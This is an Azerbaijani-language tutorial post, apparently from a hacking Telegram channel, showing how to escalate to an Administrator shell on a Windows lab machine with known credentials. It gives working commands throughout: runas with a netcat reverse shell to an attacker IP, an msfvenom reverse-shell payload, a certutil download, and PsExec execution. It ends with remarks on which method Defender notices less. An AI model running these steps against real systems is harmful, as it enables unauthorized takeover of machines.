Windows mühitində işləyərkən Fərqli Userdən Shell Əldə Etmək necə həyata keçirilir?Windows-da Fərqli Userdən Shell Əldə Etmək necə həyata keçirilir?Fərqli Userdən Shell Əldə Etmək nədir?Fərqli Userdən Shell Əldə Etmək nədir? runas.exe,psexec64.exe
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Fərqli Userdən Shell Əldə Etmək
Əgər siz məhdud səlahiyyətli istifadəçi kimi hədəf sistemdə işləyirsiniz və administrator istifadəçi adı parolunu bilirsinizsə,bu məlumatları səlahiyyətlərini artırmaq və Administrator kimi shell əldə etmək üçün istifadə edə bilərsiniz.Ən uyğun və praktiki üsul kimi yeni shell əldə etməzdən əvvəl mövcud shelli kopyalamaq daha məsləhətlidir.Bunun üçün netcat və MSFvenom istifadə edilə bilər.Daha sonra hədəf cihazda runas.exe faylı ilə netcat icra edərək Admin istifadəçisi adında shell əldə edəcəyik.
C:\Users\vagrant\Desktop>C:\Windows\System32\runas.exe /env /noprofile /user:Adm
inistrator "nc.exe 192.168.10.39 4444 -e C:\Windows\System32\cmd.exe"
Kali cihazımıza qayıdıb 4444 portuna açdığımız listeneri müşahidə etsək görərikki, artıq bizə Administrator adında shell gəlmişdir.
┌──(root㉿kali)-[~]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.10.39] from (UNKNOWN) [192.168.10.37] 50132
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\vagrant\Desktop>whoami
whoami
vagrant-2008r2\administrator
PSExec Aləti
PSExec utiliti müəyyən qədər runas kommandasına oxşayır.Siz PSExec kopyasını aşağıdakı adresdən əldə edə bilərsiniz.
docs.microsoft.com/en-us/sysinternals/downloads/psexec
Bu alət ilə runas kommandası arasındaki fərq ondadır ki,PSExec aləti bizə daha çox imkanlar verir.Məsələn: Təsəvvür edinki sizin hədəf Windows cihazına məhdud səlahiyyətlə kommanda sətrinə sahibsiniz.Siz burada Administrator hesabının məlumatlarını əldə etdiniz.(Administrator-vagrant).PsExec üsulunu yerinə yetirmək üçün MSFvenom ilə bizə yeni shell yaradacaq olan payload hazırlayırıq.
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.10.39 LPORT=5555 -f exe -o shell_reverse.exe
Daha sonra Kali cihazımızda 5555 portuna listener qururuq.
┌──(root㉿kali)-[~]
└─# nc -nvlp 5555
listening on [any] 5555 ...
Windows cihazında məhdud səlahiyyətli kommanda sətrinə gələrək,shell_reverse.exe faylını biz Windows cihazına ötürməliyik bunun üçün Kali-də python ilə veb server aktivləşdirib,Windows-da isə certutil.exe ilə yükləməliyik
===========================Kalidə========================
┌──(root㉿kali)-[~]
└─# python3 -m http.server 80
============================Windowsda======================
C:\Users\vagrant\Desktop>certutil.exe -split -f -urlcache http://192.168.10.39/s
hell_reverse.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
Bu əməliyyatları yerinə yetirdikdən sonra biz yüklədiyimiz payload faylını PSExec ilə icra edə edərəək System səlahiyyətlərinə sahib ola bilərik.
C:\Users\vagrant\Desktop>PsExec64.exe /accepteula -i -u administrator -p vagrant
C:\Users\vagrant\Desktop\shell_reverse.exe
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com
Kali cihazımızdakı nəticə isə belədir:
┌──(root㉿kali)-[~]
└─# nc -nvlp 5555
listening on [any] 5555 ...
connect to [192.168.10.39] from (UNKNOWN) [192.168.10.37] 50729
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
vagrant-2008r2\administrator
C:\Windows\system32>
Nəticə olaraq:
- runas.exe daha səsli işləyir, bu o deməkdirki, Defender və s sistem tərəfindən asan müşahidə olunur. skript icrası zamanı əlavə pəncərə açılır.
- PSexec üsulu isə daha çox imkanı var və daha səssiz işləyir.İcra zamanı əlavə pəncərə açılmır.
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat